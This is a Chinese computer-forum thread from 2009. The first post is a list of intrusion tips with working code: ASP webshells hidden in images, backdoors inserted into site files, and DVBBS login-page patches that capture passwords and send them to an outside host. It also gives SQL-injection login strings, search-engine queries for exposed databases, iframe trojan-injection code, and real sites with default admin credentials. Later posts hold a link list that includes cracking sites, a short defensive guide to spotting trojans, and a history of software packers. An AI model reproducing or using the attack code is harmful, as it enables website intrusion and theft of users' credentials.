• 2698阅读
  • 32回复

有必要再建一座电脑技术楼~!…………………… [复制链接]

上一主题 下一主题
离线lw2007
 
发帖
*
金钱
*
91币
*
信誉
0
资产
0 IST
在线时间
小时
注册时间
*
最后登录
*
只看楼主 倒序阅读 使用道具 楼主  发表于: 2009-02-22 08:55:10
1.名称:如何制作图片ASP木马 (可显示图片)
建一个asp文件,内容为<!--#i nclude file="ating.jpg"-->找一个正常图片ating.jpg,插入一句话木马(比如冰狐的),用ultraedit进行hex编译,插入图片里,为 了运行成功,还要搜索<%和%>,将其变为00,(不要替换自己asp的),再把jpg文件开头加入
以下是代码片段:
<script RUNAT=SERVER LANGUAGE=JAVAscript>eval(Request.form(#)+) </script>


2. 名称:整蛊网吧

先用精锐网吧辅助工具得到用户名和密码,然后用计算机管理联结一台机器,开telnet,连接,开共享,复制一个木马过去运行即可。

3.名称:感受MD5暴力破解的魅力
rainbowcrack用法先用rtgen生成库 "rtgen md5 byte 1 7 5 2400 40000 all"1和7代表密码最小和最大长度
阿汀我再加个方法:http://md5.rednoize.com/ 在线破解或者到http://www.md5lookup.com/?category=01-3&searck=on

4.很多时候我们做免杀木马,不用懂汇编,用北斗加壳程序就能逃杀,还有很多加壳软件,大家木马加壳的时候最好多选择不知名的加壳软件。

5.名称:隐蔽的插入型ASP木马

(1)在我们要做手脚的asp文件里加入如下内容

以下是代码片段:
<%if request("action")="ok" then%>



shell代码插在这里,最好是小马,还要加密一下

以下是代码片段:
<%end if%>


访问的时候在你作手脚的asp文件后面加上?action=ok,即可

(2)另一种方法,在我们要做手脚的asp文件里加入如下内容

以下是代码片段:
<%
on error resume next
strFileName = Request.QueryString("filer")
set objStream = Server.createObject("ABODB.Stream")
objStream.Type = 1
objStream.Open
objStream.LoadFromFile strFileName
objStream.SaveToFile Server.mappath("ating.asp"),2
%>


访问的时候在做手脚的asp文件后面加上?filer=XXX ,XXX为你本地上传的一个路径如 c:ating123.asp上传后在做手脚的asp的同文件夹中有ating,asp。

(3)前提得到system权限,

进入网站目录下一层
mkdir s…
copy ating.asp s…/
这样杀毒软件找不到的
访问http://网站/s…/ating.asp即可

6. 工具http://hack520.tengyi.cn/chaojiyonghu.rar,此工具在该电脑生成一个超级用户 用户名为:hack 密码110,在DOS下和计算机管理器上看不到你建立的用户,并且是删除不掉的

7.名称:QQ群脚本攻击

打开qq对话诓,复制消息,然后下面的内容保存为.vbs 文件,运行即可

以下是引用片段:
Set WshShell= WScript.createobject("WScript.Shell")
WshShell.AppActivate "QQ信息攻击脚本"
for i=1 to 20
WScript.Sleep 1000
WshShell.SendKeys"^v"
WshShell.SendKeys i
WshShell.SendKeys "%s"
Next



8.搜索:程序制作:万鹏 有免费申请空间的,直接上传asp马即可

9. 名称:全面找出你站上的ASP木马

(1) 用杀毒软件
(2) 用FTP客户端软件,点"工具"->"比较文件夹"
(3) 用asplist2.0.asp上传到站点空间查看,一般功能多的ASP我估计就是ASP木马
(4) 用工具Beyond Compare

10名称:拓展思路拿DVBBS帐号 "一个人的圣经"的动画

(1)以前获得webshell后想进入DVBBS的后台,想要管理员的密码,可以这样
老办法:
修改admin_login.asp得到明文DVBBS后台密码
在"username=trim(replace(request("username")这行后面
Dim fsoObject
Dim tsObject
Set fsoObject = Server.createObject("Scripting.FileSystemObject")
set tsObject = fsoObject.createTextFile(Server.MapPath("laner.txt"))
tsObject.Write CStr(request("password"))
Set fsoObject = Nothing
Set tsObject = Nothing
只要管理员登陆后台,在目录下就生成了laner.txt

(2)login.asp中Case "login_chk"下:

以下是代码片段:

on error resume next
Dim rain
set rain=server.createobject("adodb.stream")
rain.Type=2
rain.CharSet="gb2312"
rain.Position=rain.Size
rain.Open
rain.LoadFromFile server.MapPath("laner.asp")
rain.writetext now&request("username")&"text:"&request("password")&chr(10)
rain.SaveToFile server.MapPath("laner.asp"),2
rain.Close
set rain=nothing



这样laner.asp将获得全部登陆人的登陆时间,用户名和密码

(3)如果你有自己的网站或者另外的webshell(强烈建议使用):

可以建立目录laner,在里面建立一个空的laner.asp和如下代码的rain.asp:

以下是代码片段:
<%if request("n")<>"" and request("p")<>"" then
on error resume next
Dim rain
set rain=server.createobject("adodb.stream")
rain.Type=2
rain.CharSet="gb2312"
rain.Position=rain.Size
rain.Open
rain.LoadFromFile server.MapPath("laner.asp")
rain.writetext now&"Name:"&request("n")&"Password:"&request("p")&chr(10)
rain.SaveToFile server.MapPath("laner.asp"),2
rain.Close
set rain=nothing
end if%>


11. 名称:利用QQ在线状态抓鸽子肉鸡

生成qq在线状态,把里面的地址改成木马地址,发到论坛在login.asp那里插入一句:

以下是代码片段:
response.write"<scriptsrc=http://www.ptlushi.com/laner/rain.asp?n="&request("username")

&""&"&p="&request("password")&"></script>"
response.write"<iframesrc=http://yourwebsite/laner/rain.asp?n="&request("username")

&""&"&p="&request("password")&"></iframe>"



结果所有登陆人都会乖乖的把名字和密码送到你的laner.asp 里

12. 动画名称:媒体中国整站程序存在多处漏洞

漏洞程序:媒体中国整站程序(第一版)官方网站:http://meiti.elgod.com/漏洞: %5c(暴库) 上传 注入上传页面:down1/upload.asp

13. 名称:免费电话+MSH命令行工具

http://www.globe7.com/ 打开主页,点击坐下角,Free DownLoad,下载到本地,安装,
运行后,会提示正在寻找你所在地区的区号。由于是国际长途,注册一个帐号,送100美分,国内计时0.01/分,你就有100分钟可以白打。是一个帐号哦。

要注意的就是,固定电话,小灵通 形式为0086521123456 521本来时0521,要省略前面的零,手机号也是一样。

14. 名称:Bo-Blog的新漏洞

http://网址/index.php?job=../admin/ban把其中"禁止搜索的词"那部分<table>另存出来,里面的地址改完整,插入一句话木马

15. 名称:钩魂者入侵传奇私服
用百度 搜索 传奇 inurl:tuku 或者 传奇 inurl:wplm.htm 再或者 传奇 inurl:coolsites.asp友情链接里插入一句话木马即可。

16. 程序: 宏达企业整站上传漏洞 官方主页:http://www.mu126.com/漏洞页面:/cx/upfile.asp (上传漏洞)

17.无间盗邮箱,在修改密码里,用户名和密码里添or=or

18.名称: bbsxp5.16后台得到webshell

bbsxp5.16过滤了 asp,asp,cdx,cer,扩展名的文件上传,就是在基本设置上添加上上传类型也不行,并禁止了修改数据备份数据名称,我们可以把此网页保存在本地,改源代码上传。

19.名称:JHACKJ 2005年最新精典教程

下载看看吧,不错,各大网站都有

20.名称:省力入侵韩国肉鸡

在啊D的扫描注入点项,打开这个:http://www.google.co.kr/advanced_search?hl=zh-CN这是高级搜索项,关键字随便写。这里我写asp?name= 设置为每页显示100条。语种选择韩文。搜索,很多sa.

21.名称:任何网吧的管理系统破解
选智能ABC,然后vv输入,光标后退两步,按delete键 刚输入的两个vv删除,最后按Inter键 。

22.名称:破解QQ空间插入网页木马的代码

现在腾讯 已经封了很多QQ空间代码了 就如 以前 <iframe src="木马地址" name="lcx" width="0" height="0" frameborder="0"></iframe>插入网页木马的代码也早被封了
突破禁用的方法 代码如下:

以下是代码片段:
<div id=DI><img src="javascript :DI.innerHTML=\<iframe src=木马地址 width=190 height=190

marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no></iframe>\"

style=display:none></div>



最后附上 卡拉是条ok 总结的

1.上传漏洞[不多讲]
pS: 如果看到:选择你要上传的文件 [重新上传]或者出现"请登陆后使用",80%就有漏洞了!
有时上传不一定会成功,这是因为Cookies不一样.我们就要用WSockExpert取得Cookies.再用DOMAIN上传.

2.注入漏洞[不多讲]

pS:对MD5密码.有时我们不是哪么容易跑出来.如果是[SQL数据库].那么我们可以用以下命令:
http://注入网址;update admin set password=\新MD5密码\ where password=\旧MD5密码\-- [admin为表名.]

3.旁注,也就是跨站.

我们入侵某站时可能这个站坚固的无懈可击,我们可以找下和这个站同一服务器的站点,然后在利用这个
站点用提权,嗅探等方法来入侵我们 要入侵的站点。,在这里有个难点,就是一些服务器的绝对路径经过加密,这就看我们的本事了。

4.暴库:把二级目录中间的/换成%5c
EY:http://www.ahttc.edu.cn/otherweb/dz/bgs/BigClass.asp?BigClassName=职责范围&BigClassType=1如果你能看到:\E:ahttc040901otherwebdzdatabaseiXuEr_Studio.asa\不是一个有效的路径。 确定路径名称拼写是否正确,以及是否 连接到文件存放的服务器。这样的就是数据库了。下载时用FLASHGET换成.MDB格式的就行.


5.\or\=\or\这是一个可以连接SQL的语名句.可以直接进入后台。我收集了一下。类似的还有:
\or\\=\ " or "a"="a \) or (\a\=\a ") or ("a"="a or 1=1-- \ or \a\=\a

6.社会工程学。这个我们都知道吧。就是猜解。
 EY:http://www.neu.edu.cn/waishi/admin
admin waishi

7.写入ASP格式数据库。就是一句话木马[<%execute request("value")%> ],常用在留言本.
EY:http://www.ahsdxy.ah.edu.cn/ebook/db/ebook.asp[这个就是ASP格式的数据库],再写入一句话木马

8.源码利用:一些网站用的都是网上下载的源码.有的站长很菜.什么也不改.
EY:http://www.ahsdxy.ah.edu.cn/xiaoyoulu/index.asp
这个站用的是:杰出校友录,源码我下过了,默认数据库/webshell路径:databaseliangu_data.mdb 后台管理:adm_login.asp 密码及用户名都是admin

9.默认数据库/webshell路径利用:这样的网站很多/利人别人的WEBSHELL.
/Databackup/dvbbs7.MDB
/bbs/Databackup/dvbbs7.MDB
/bbs/Data/dvbbs7.MDB
/data/dvbbs7.mdb
/bbs/diy.asp
/diy.asp
/bbs/cmd.asp
/bbs/cmd.exe
/bbs/s-u.exe
/bbs/servu.exe
工具:网站猎手 挖掘鸡
EY:http://www.cl1999.com/bbs/Databackup/dvbbs7.MDB

10.查看目录法:人一些网站可以断开目录,可以方问目录。
EY:http://www.ujs168.com/shop/admin/
http://escolourfvl.com/babyfox/admin/%23bb%23dedsed2s/

这样我们可以找到数据库,下载不用我教吧

11.工具溢出:.asp?NewsID= /2j.asp?id=18 .asp?id=[这种方法可以取得大量的WEBSHELL]

12.搜索引擎利用:

(1).inurl:flasher_list.asp 默认数据库:database/flash.mdb 后台/manager/
(2).找网站的管理后台地址:
site:xxxx.comintext:管理
site:xxxx.comintitle:管理 <关键字很多,自已找>
site:xxxx.cominurl:login
(3).查找access的数据库,mssql、mysql的连接文件
allinurl:bbsdata
filetype:mdbinurl:database
filetype:incconn
inurl:datafiletype:mdb
我主不做了。。自已做做吧。。

13.COOKIE欺骗:

把自己的ID修改成管理员的,MD5密码也修改成他的,用桂林老兵工具可以修改COOKIE。这个我就不多讲了

14.利用常见的漏洞:如动网BBS
EY:http://js1011.com/bbs/index.asp
可以先用:dvbbs权限提升工具,使自已成为前台管理员。THEN,运用:动网固顶贴工具,找个固顶贴,再取得COOKIES,这个要你自已做。我们可以用WSockExpert取得Cookies/NC包这个我就不做了,网上教程多的是,自已下个看看。

工具:dvbbs权限提升工具 动网固顶贴工具
离线lw2007
发帖
*
金钱
*
91币
*
信誉
0
资产
0 IST
在线时间
小时
注册时间
*
最后登录
*
只看该作者 沙发  发表于: 2009-02-22 09:04:08
  实用网址






:共享软件下载
华军软件园:http://www.newhua.com/
天空软件站:http://www.skycn.com/


2:汉化软件下载
汉化新世纪:http://www.hanzify.org/


3:破解软件
霏凡软件站: http://www.crsky.com/default.html
中国破解联盟:http://www.cncrk.com/



4:电脑硬件知识,价格资讯网
中关村在线:http://www.zol.com.cn/
小熊在线:http://www.beareyes.com.cn/


5:电脑知识交流,故障帮助论坛
中国电脑视频网:http://bbs.cnpcv.com/
电脑爱好者:http://bbs.cfanclub.net/

6:制图软件学习网站
太平洋电脑网:http://www.pconline.com.cn/

硅谷动力:http://www.enet.com.cn/


7:计算机专题学习以及电脑学习视频下载站
中国电脑视频网:http://www.cnpcv.com


8:字体下载
字体精品网:http://www.goodfont.net/

9:图片素材下载
素材精品屋:http://www.sucaiw.com/
图酷:http://www.tucoo.com/


10:免费电子书下载
我爱E书网:http://www.52ebooks.com/


11:免费FLASH游戏,MTV娱乐网
走进计算机网 www.inpce.com/flash

12:免费小说在线阅读网
小说阅读网:http://www.readnovel.com/


13:免费MP3在线听
QQ163:http://www.qq163.com/
音乐试听:http://music.hk971.com/


14:免费电影网
宽频世界:http://bbsky.wuhan.net.cn/free_login.aspx(限湖北地区)
TOM365:http://www.tom365.com/
网络电视:www.pplive.com
运城娱乐:http://vod.yc1000.com/


15:游戏外挂网
游戏999:http://www.uc999.com/



16:游戏资讯网
17173:http://www.17173.com/



17 电信管方测试站,任意输入8位数即可,屡试不爽
http://221.237.161.42/user-page-media/usertest_testresult.jsp


18 一个还可以的图片制作素材站http://sucaicd.com



19 个人认为最棒的EXCEL学习网站www.excelhome.net


20 网络书签(个人觉得比较好的)www.35766.com


21 全世界软件注册码查找中心 http://www.crack-locator.com/


22 想学电脑的进这个网站 http://www.cnpcv.com



23 推荐一个免费的古典音乐网址http://www.guqu.net


24 喜欢看报的朋友请进,全国各大报纸都有http://www.haogao.com/bkml/dzbz.htm


25 全球最牛的网址 http://3.14159265358979323846264 ... 05820974944592.com/


26 不错的考试资料网站!http://www.kuangfeng.com


27 难得一见的破解网站---你不得不看的好站www.hack58.com全是动画教程..还有工具.轻松上手


28 一个FREE的MTV、游戏。。。下载网站www.169s.com


29 中国电脑视频网 http://www.cnpcv.com




30 有个可以做MICORSOFT和其他认证课程在线实验的地方


http://www.chinaitlab.com/www/school/micorsoft-lab.asp



31 N多个DLL文件,如果自己那天丢了个DLL文件可以去找找,几乎全有
http://www.dll-files.com/dllindex/index.shtml



32 电子书下载中心http://www.eshunet.com


33 买手机,想知道假,查www.tenaa.com.cn


34 给大家推荐一个找代理的好地方!!!代理中国 http://web.proxycn.com/


35 免费短信,无须注册,暂时只支持移动。
http://www.zhuomeng.com/freesms/free_sms.asp
离线lw2007
发帖
*
金钱
*
91币
*
信誉
0
资产
0 IST
在线时间
小时
注册时间
*
最后登录
*
只看该作者 板凳  发表于: 2009-02-22 09:05:48
利用以下命令可以识别木马,远离木马烦扰。

  检测网络连接

  如果你怀疑自己的计算机上被别人安装了木马,或者是中了病毒,但是手里没有完善的工具来检测是不是真有这样的事情发生,那可以使用 Windows自带的网络命令来看看谁在连接你的计算机。具体的命令格式是:netstat -an 。这个命令能看到所有和本地计算机建立连接的IP,它包含四个部分——proto(连接方式)、local address(本地连接地址)、foreign address(和本地建立连接的地址)、state(当前端口状态)。通过这个命令的详细信息,我们就可以完全监控计算机上的连接,从而达到控制计算机的目的。

  禁用不明服务

  很多朋友在某天系统重新启动后会发现计算机速度变慢了,不管怎么优化都慢,用杀毒软件也查不出问题,这个时候很可能是别人通过入侵你的计算机后给你开放了特别的某种服务,比如IIS信息服务等,这样你的杀毒软件是查不出来的。但是别急,可以通过“net start”来查看系统中究竟有什么服务在开启,如果发现了不是自己开放的服务,我们就可以有针对性地禁用这个服务了。方法就是直接输入“net start”来查看服务,再用“net stop server”来禁止服务。

  轻松检查账户

  很长一段时间,恶意的攻击者非常喜欢使用克隆账号的方法来控制你的计算机。他们采用的方法就是激活一个系统中的默认账户,但这个账户是不经常用的,然后使用工具把这个账户提升到管理员权限,从表面上看来这个账户还是和原来一样,但是这个克隆的账户却是系统中最大的安全隐患。恶意的攻击者可以通过这个账户任意地控制你的计算机。为了避免这种情况,可以用很简单的方法对账户进行检测。

  首先在命令行下输入net user,查看计算机上有些什么用户,然后再使用“net user+用户名”查看这个用户是属于什么权限的,一般除了Administrator是administrators组的,其他都不是!如果你发现一个系统内置的用户是属于administrators组的,那几乎肯定你被入侵了,而且别人在你的计算机上克隆了账户。快使用“net user 用户名/del”来删掉这个用户吧!
离线大皮球

发帖
68728
金钱
340137
91币
8
信誉
0
资产
0 IST
在线时间
4325 小时
注册时间
2007-08-25
最后登录
2020-11-12
只看该作者 3楼 发表于: 2009-02-22 09:08:19
你那个楼也挂了?
离线lw2007
发帖
*
金钱
*
91币
*
信誉
0
资产
0 IST
在线时间
小时
注册时间
*
最后登录
*
只看该作者 4楼 发表于: 2009-02-22 09:10:43
[讨论]加壳与脱壳


我写这篇东西的主要目的是让初到本站的新手们能对"壳"有个大概的认识,知道我每天说了些什么。限

于本人的知识,如果有ERROR 之处,还请多原谅。如果你觉得还可以, 也欢迎转贴,但请保留文章的完

整性和作者的资料。当然如果你想把它发表,硬塞些稿费给俺花花,我也不会拒绝的。)作为一个以"壳

"为主的站台,如果连访者连什么是"壳"都不清楚的话,那我也太失败了。很早以前就想写编完全关于"

壳"的文章,但苦于时间和文字水平的关系,都没提笔。本着对站台负责的态度,现在经过一天的努力,

"打"出这编尝试由壳的历史一直谈到最新发展的本章来。

首先要认识脱壳

一切从"壳"开始

  我写这篇东西的主要目的是让初到本站的新手们能对"壳"有个大概的认识,知道我每天说了些什么

。限于本人的知识,如果有ERROR 之处,还请多原谅。如果你觉得还可以, 也欢迎转贴,但请保留文章

的完整性和作者的资料。当然如果你想把它发表,硬塞些稿费给俺花花,我也不会拒绝的。)    

   

  作为一个以"壳"为主的站台,如果连访者连什么是"壳"都不清楚的话,那我也太失败了。很早以前

就想写编完全关于"壳"的文章,但苦于时间和文字水平的关系,都没提笔。本着对站台负责的态度,现

在经过一天的努力,"打"出这编尝试由壳的历史一直谈到最新发展的本章来。

  首先我想大家应该先明白"壳"的概念。在自然界中,我想大家对壳这东西应该都不会陌生了,植物

用它来保护种子,动物用它来保护身体等等。同样,在一些计算机软件里也有一段专门负责保护软件不

被非法修改或反编译的程序。它们一般都是先于程序运行,拿到控制权,然后完成它们保护软件的任务

。就像动植物的壳一般都是在身体外面一样理所当然(但后来也出现了所谓的"壳中带籽"的壳)。由于

这段程序和自然界的壳在功能上有很多相同的地方,基于命名的规则,大家就把这样的程序称为"壳"了

。就像计算机病毒和自然界的病毒一样,其实都是命名上的方法罢了。

   最早提出"壳"这个概念的,据我所知,应该是当年推出脱壳软件 RCOPY 3 的作者熊焰先生。在几

年前的 DOS 时代,"壳"一般都是指磁盘加密软件的段加密程序,可能是那时侯的加密软件还刚起步不久

吧,所以大多数的加密软件(加壳软件)所生成的"成品"在"壳"和需要加密的程序之间总有一条比较明

显的"分界线"。有经验的人可以在跟踪软件的运行以后找出这条分界线来,至于这样有什么用这个问题

,就不用我多说了。但毕竟在当时,甚至现在这样的人也不是很多,所以当 RCOPY3 这个可以很容易就

找出"分界线",并可以方便的去掉"壳"的软件推出以后,立即就受到了很多人的注意。老实说,这个我

当年在《电脑》杂志看到广告,在广州电脑城看到标着999元的软件,在当时来说,的确是有很多全新的

构思,单内存生成 EXE 可执行文件这项,就应该是世界首创了。但它的思路在程序的表现上我认为还有

很多可以改进的地方(虽然后来出现了可以加强其功力的 RO97),这个想法也在后来和作者的面谈中得

到了证实。在这以后,同类型的软件想雨后春笋一般冒出来,记得住名字的就有: UNKEY、MSCOPY、

UNALL .... 等等,但很多的软件都把磁盘解密当成了主攻方向,忽略了其它方面,当然这也为以后的"

密界克星""解密机器"等软件打下了基础,这另外的分支就不多祥谈了,相信机龄大一点的朋友都应该看

过当时的广告了。

   解密(脱壳)技术的进步促进、推动了当时的加密(加壳)技术的发展。LOCK95和 BITLOK 等所谓

的"壳中带籽"加密程序纷纷出笼,真是各出奇谋,把小小的软盘也折腾的够辛苦的了。正在国内的加壳

软件和脱壳软件较量得正火红的时候,国外的"壳"类软件早已经发展到像 LZEXE 之类的压缩壳了。这类

软件说穿了其实就是一个标准的加壳软件,它把 EXE 文件压缩了以后,再在文件上加上一层在软件被执

行的时候自动把文件解压缩的"壳"来达到压缩 EXE 文件的目的。接着,这类软件也越来越多, PKEXE、

AINEXE、UCEXE 和后来被很多人认识的 WWPACK 都属于这类软件,但奇怪的是,当时我看不到一个国产

的同类软件。

   过了一段时间,可能是国外淘汰了磁盘加密转向使用软件序列号的加密方法吧,保护 EXE 文件不

被动态跟踪和静态反编译就显得非常重要了。所以专门实现这样功能的加壳程序便诞生了。 MESS 、

CRACKSTOP、HACKSTOP、TRAP、UPS 等等都是比较有名气的本类软件代表,当然,还有到现在还是数一数

二的,由台湾同胞所写的 FSE 。其实以我的观点来看,这样的软件才能算是正宗的加壳软件。

  在以上这些加壳软件的不断升级较劲中,很多软件都把比较"极端"技术用了上去,因为在这个时候

DOS 已经可以说是给众高手们玩弄在股掌之间了,什么保护模式、反 SICE 、逆指令等等。相对来说,

在那段时间里发表的很多国外脱壳程序,根本就不能对付这么多的加壳大军,什么 UPC、TEU 等等都纷

纷成为必防的对象,成绩比较理想的就只有 CUP386 了,反观国内,这段时间里也没了这方面的"矛盾斗

争"。加壳软件门挥军直捣各处要岗重地,直到在我国遇到了 TR 这个铜墙铁壁以后,才纷纷败下阵来各

谋对策,但这已经是一年多以后的事情了。我常想,如果 TR 能早两年"出生"的话,成就肯定比现在大

得多,甚至盖过 SICE 也有可能。TR 发表的时候 WIN95 的流行已经成为事实,DOS 还有多少的空间,

大家心里都清楚。但话又说回来, TR 的确是个好软件,比起当年的 RCOPY3 有过之而无不及,同时也

证明了我们中国的 CRACK 实力(虽然有点过时)。这个时候,前面提到过的 FSE 凭着强劲的实力也渐

渐的浮出了水面,独领风骚。其时已经是 1997 年年底了,我也走完了学生"旅程"。工作后在CFIDO 的

CRACK 区认识了 Ding-Boy ,不久 CRACK 区关了,我从此迷上了 INTERNET,并于98年6月建起了一个专

门介绍"壳"的站台: http://topage.126.com ;,放上了我所收集的所有"壳"类软件。在这段时间里,

各种"壳"类软件也在不段的升级换代,但都没什么太大的进展,差不多就是 TR 和众加壳软件的版本数

字之争而已。
  1998年8月,一个名为 UNSEC (揭秘)的脱壳软件发表了,它号称可以脱掉98年8月以前发表的所有

壳。我测试之后,觉得并没传闻中的那么厉害,特别是兼容性更是令我不想再碰它。 Ding-Boy 给这个

软件的作者提了很多建议,但寄去的 EMIAL 有如泥牛入海,可能是一怒之下吧,不久 Ding-Boy 的 BW

(冲击波)就诞生了。这个使用内存一次定位生成 EXE 文件(后来放弃了)的脱壳软件,在我的站台公

开后,得到了很多朋友们的肯定。要知道,从RCOPY 3 开始,绝大部分的脱壳软件都是要两次运行目标

程序来确定 EXE 的重定位数据的。BW 的这一特点虽然有兼容性的问题,但也树立了自己的风格、特色

。经过几个月的改善, BW 升级到了 2.0 版本,这个版本的推出可以说是 BW 的转折点,因为它已经是

一个成熟、稳定脱壳软件了,它可以对付当时(现在)大多数的壳,包括当时最新的 FSE 0.6 等。更重

要的是这个版本把选择壳的和软件"分界线"这个最令新手头疼的步骤简化到不能再简化的地步,使更多

的朋友接受了它。另外,能加强 BW 功力的 CI 模式也是其它脱壳软件没有的东西。最近,BW 发表了最

新的 2.5 BETA2 版本,增强了一些方面的功能,因它竟然可以脱掉号称最厉害的磁盘加密工具

LOCKKING 2.0 的加密壳,因而进一步奠定了它在"脱壳界"的地位。说到最新,就不能不提 GTR、LTR、

EDUMP、ADUMP、UPS、UPX、APACK 这几个国外的好软件了,它们每个都有自己的特色,可以说都是当今

各类"壳"中的最新代表了。(这些软件和详细介绍请到我的主页查阅)

  由于 WINDOWS 3.1 只是基于 DOS 下的一个图形外壳,所以在这个平台下的"壳"类软件很少,见过

的就只有像 PACKWIN 等几个有限的压缩工具,终难成气候。

   可能是 MICROSOFT 保留了 WIN95 的很多技术上的秘密吧,所以即便是 WIN95 已经推出了 3 年多

的时间,也没见过在其上面运行的"壳"类软件。直到 98 年的中期,这样的软件才迟迟的出现,而这个

时候 WIN98 也发表了有一段日子了。应该是有 DOS 下的经验吧,这类的软件不发表由自可,一发表就

一大批地的冲了出来。先是加壳类的软件如: BJFNT、PELOCKNT 等,它们的出现,使暴露了 3 年多的

WIN95 下的 PE 格式 EXE 文件得到了很好的保护。大家都应该知道现在很多 WIN95 下的软件都是用注

册码的方法来区分、确定合法与非法用户的吧,有了这类加壳软件,这种注册方法的安全性提高了不少

,如果大家也有自己编的 WIN95 程序,就一定要多留意一下本类软件了。接着出现的就是压缩软件了,

因为 WIN95 下运行的 EXE 文件"体积"一般都比较大,所以它的实用价值比起 DOS 下的压缩软件要大很

多,这类的软件也很多,早些时候的 VBOX、PEPACK、PETITE 和最近才发表的 ASPACK、UPX 都是其中的

佼佼者。在 DOS 下很流行的压缩软件 WWPACK 的作者也推出了对应 WIN95 版本的 WWPACK32,由于性能

并不是十分的突出,所以用的人也不太多。由于压缩软件其实也是间接给软件加了壳,所以用它们来处

理 EXE 也是很多软件作者喜欢做的事情,最近新发表的很多软件里都可以看到这些加壳、加压缩软件的

名字了。有加壳就一定会有脱壳的,在 WIN95 下当然也不例外,但由于编这类软件比编加壳软件要难得

多,所以到目前为止,我认为就只有 PROCDUMP 这个软件能称为通用脱壳软件了,它可以对付现在大多

数的加壳、压缩软件所加的壳,的确是一个难得的精品。其它的脱壳软件多是专门针对某某加壳软件而

编,虽然针对性强、效果好,但收集麻烦,而且这样的脱壳软件也不多。前些时候 TR 作者也顺应潮流

发表了 TR 的 WIN95 版本: TRW ,由现在的版本来看可以对付的壳还不多,有待改进。


  BW 的作者 Ding-Boy 最新发表了一个 WIN95 的 EXE 加壳软件 DBPE 。虽然它还不太成熟,但它可

以为软件加上使用日期限制这个功能是其它加壳软件所没有的,或者以后的加壳软件真的会是像他说的

那样可以:加壳和压缩并重、并施;随意加使用日期;加上注册码;加软件狗(磁盘)保护;加硬件序

列号判别;加... 。

附加一点内容





--------------------------------------------------------------------------------
此内容只有作者和已经回复此帖的浏览者能浏览:

一.壳的概念
作者编好软件后,编译成exe可执行文件
1.有一些版权信息需要保护起来,不想让别人
随便改动,如作者的姓名等
2.需要把程序搞的小一点,从而方便使用
于是,需要用到一些软件,他们能将exe可执行文件压缩,
实现上述两个功能,这些软件称为加壳软件或压缩软件.
它不同于一般的winzip,winrar等压缩软件.
它是压缩exe可执行文件的,压缩后的文件可以直接运行.

二.加壳软件
最常见的加壳软件ASPACK ,UPX,PEcompact
不常用的加壳软件WWPACK32;PE-PACK ;PETITE ;NEOLITE

三.侦测壳和软件所用编写语言的软件
1.侦测壳的软件fileinfo.exe 简称fi.exe(侦测壳的能力极强)
使用方法:

第一种:待侦测壳的软件(如aa.exe)和fi.exe位于同一目录下,执行
windows起始菜单的运行,键入
fi aa

第二种:待侦测壳的软件(如aa.exe)和fi.exe位于同一目录下,将aa的图标拖到fi的图标上
2.侦测壳和软件所用编写语言的软件language.exe(两个功能
合为一体,很棒) 推荐language2000中文版,我的主页可下载
傻瓜式软件,运行后选取待侦测壳的软件即可(open)


图中所示软件cr-xxzs.exe是用Visual Basic6.0编的,upx加壳

3.软件常用编写语言Delphi,VisualBasic(VB)---最难破,VisualC(VC)

四.常用资源
1.破解工具站点(以上工具从这里找)
www.exetools.com
www.pediy.com
http://www.programmerstools.com(guowai/
www.cracknow.com
2.软件站点
www.newhua.com
www.hktk.com
http://www.esoftware.com.cn/ (强烈推荐,这里能找到软件的各个版本,尤其是旧版本。以后破解例子

中所用软件一般在这儿都能找到)
www.shareware.net.cn
www.csdn.net
五.国外破解站点

-----------破解教程类:---------


1. +HCU Academy - http://Tsehp(dot)cjb(dot)net (Academy - Best)

2. The Krobar Collection: http://Krobar.cjb.net (Recommended)

3. CoDe_InSiDe - http://codeinside.cjb.net (Mine/CoDe's tutorials)

4. Eternal_Bliss - http://ebliss.cjb.net (Visual-Basic)

5. +Sandman - http://www.idca.com/~thesandman/index2.html (Best - Recommended)

6. Icezelion's Win32Asm - http:/win32asm.cjb.net (Coding)

7. tHE Egoiste - http://egoiste.da.ru (Great page with Crypto Stuff)

8. CrackMe's Page - http://crackmes.cjb.net (Recommended, dl all CrackMe from here)


--------破解工具类:---------


1. Programmers Tools - http://protools.cjb.net (Best)

2. Play Tools - http://playtools.cjb.net (Great)

3. EXE Tools - http://exetools.cjb.net/ (Average)

4. Aaron's Tools - http://mud.sz.jsinfo.net/per/aaron/index.htm (Average)

5. http://ProcDump32.cjb.net

6. Freak2freak.cjb.net

7. www.sysinternals.com (FileMon)

8. http://rpi.net.au/~ajohnson/resourcehacker

9. http://muaddib.immortaldescendants.org

10.http://frog.fsn.net (May be down)


-----------破解组织类:-----------


1. PGC - http://www.pgc-force.com

2. The Millenium Group - http://tmg.da.ru/ (Keygen Factory :-)

3. HellForge - http://www.hellforge.org/

4. The Cracking Answer - http://tca2k.da.ru/

5. Immortal Descendants - http://www.immortaldescendants.org

6. TrickSoft - http://emc2k.com/tricksoft/

7. DOOM - http://deadlyzone.virtualave.net/Html/load.htm

8. http://www.suddendischarge.com/



五.作业
1.结合我讲的,看看雪教程的相关内容,吃透
2.熟练掌握fi和language的使用方法
3.下载一些软件,侦测它的壳和软件所用编写语言



  通过上一节,我想大家己认识了什么是壳的概念了,也是说运行加壳程序时, 用户执行的实际上是

这个外壳的程序,而这个外壳程序负责把用户原来的程序在内存中解压缩,并把控制权交还给解开后的

真正的程序,由于一切工作都是在内存中运行,用户根本不知道也不需要知道其运行过程,只要执行起

来没有变化就好。当时有些人担心这些解压缩的工作会给程序带来额外的运行时间,但实际上所有的可

执行文件都要读到内存中去执行,文件小了,从计算机硬盘上读到内存的时间自然也少了,两下相抵,

实际上用户并不会感觉程序慢了多少。脱壳的就是把在内存中真正还原的程序抓取下来,修正后变成可

执行的文件。

  在Windows 95/NT/2000 上的文件格式是Portable Executable File Format(即PE格式),该格式应

用于所有基于Win32的系统。由于现在windows的普及,下面谈到的壳都是基于这种文件格式。

压缩工具介绍(PACKERS)

  我们这里谈的压缩工具不是Winzip,WINRAR等工具(它们是可压缩任何文件),而是谈专门压缩

windows下的 PE 格式EXE或DLL文件的工具,压缩的EXE文件是自解压可执行文件。

  常用压缩工具(Windows Packers )列表:

名称 作者 主页 介绍
ASPack Alexey Solodovnikov www.aspack.com 是俄国作者Alexey Solodovnikov写的一个非常强大的

Win32压缩工具,其压缩率、速度和兼容性很不错,是目前很流行的一种压缩工具。
UPX Markus Oberhumer & Laszlo Molnar Homepage 非常全能的 EXE 压缩软件,并可用UPX -D命令脱壳


